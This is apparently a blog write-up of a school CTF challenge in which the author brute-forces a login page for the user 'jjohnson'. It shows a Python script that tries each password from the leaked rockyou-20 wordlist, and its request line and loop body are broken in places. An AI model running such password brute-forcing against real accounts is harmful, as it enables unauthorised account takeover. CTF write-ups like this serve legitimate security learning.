my ctf writeups

Apoorva Saurav | about

Lost my password (200)

crypto - Louisa County High School

Challenge description:

Hello, my name is John. I have lost my password. See if you can help me get into my account. Don’t forget to checkout the attached login.php. My username is jjohnson.

Download file: lostmypassword.php


We are given another login page and told to login as the user jjohnson. Last time, logging as the admin provided a hint. This time, if we try admin/admin, we see:

All hail the admin!!

jjohnson is the one who needs help.

Louisa County Public Schools CTF Brute Force Attack.

Now that we know it’s brute force, we can write a script.

import requests
from tqdm import tqdm
import sys

with open(sys.argv[1], "r") as f:
    words = f.readlines()

words = [word.strip() for word in words]

for w in tqdm(words):
    data = {"uid": "jjohnson", "password": w}
    response ="", data=data)
    if "ctf{" in str(response.text).lower():

This iterates through every word in a given wordlist and attempts to pass it in as the password of jjohnson. I started with rockyou-20.

$ python /usr/share/seclists/Passwords/Leaked-Databases/rockyou-20.txt
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				Welcome John The Ripper!! You are now logged in!</a>
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		<p><h4><a href="logout.php">Logout</a><h4> </p>
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				 <h2>Congratulations!!! You did it!!!</h2> </br></br> The Flag is: *********************  .</a>
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		<p>Louisa County Public Schools CTF Brute Force Attack.</p>

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